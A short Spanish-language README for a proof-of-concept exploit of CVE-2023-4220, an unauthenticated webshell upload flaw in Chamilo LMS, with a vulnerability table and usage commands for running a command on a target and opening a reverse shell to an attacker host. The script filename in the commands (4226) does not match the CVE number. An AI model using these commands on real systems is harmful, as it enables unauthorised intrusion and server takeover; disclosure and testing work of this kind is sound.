
POC para CVE-2023-4220 - Chamilo LMS Unauthenticated Big Upload File Remote Code Execution
Más información sobre CVE-2023-4220: Aviso de StarLabs
| Producto | Chamilo |
|---|---|
| Vendedor | Chamilo |
| Gravedad | Alta - Los adversarios pueden explotar vulnerabilidades de software para obtener ejecución remota de código no autenticada. |
| Versiones afectadas | <= v1.11.24 |
| Versiones probadas | v1.11.24 (última versión al momento de escribir) |
| Identificador CVE | CVE-2023-4220 |
| Descripción CVE | Carga de archivos sin restricciones en la funcionalidad de carga de archivos grandes en /main/inc/lib/javascript/bigupload/inc/bigUpload.php en Chamilo LMS <= v1.11.24 permite a atacantes no autenticados realizar ataques de cross-site scripting almacenado y obtener ejecución remota de código mediante la subida de una webshell. |
| Clasificación CWE | CWE-434: Carga sin restricciones de archivos con tipo peligroso |
| Clasificación CAPEC | CAPEC-650: Subir una webshell a un servidor web |
Para ejecutar comandos directamente, use el siguiente comando:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami
Para obtener una shell inversa, use el siguiente comando:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>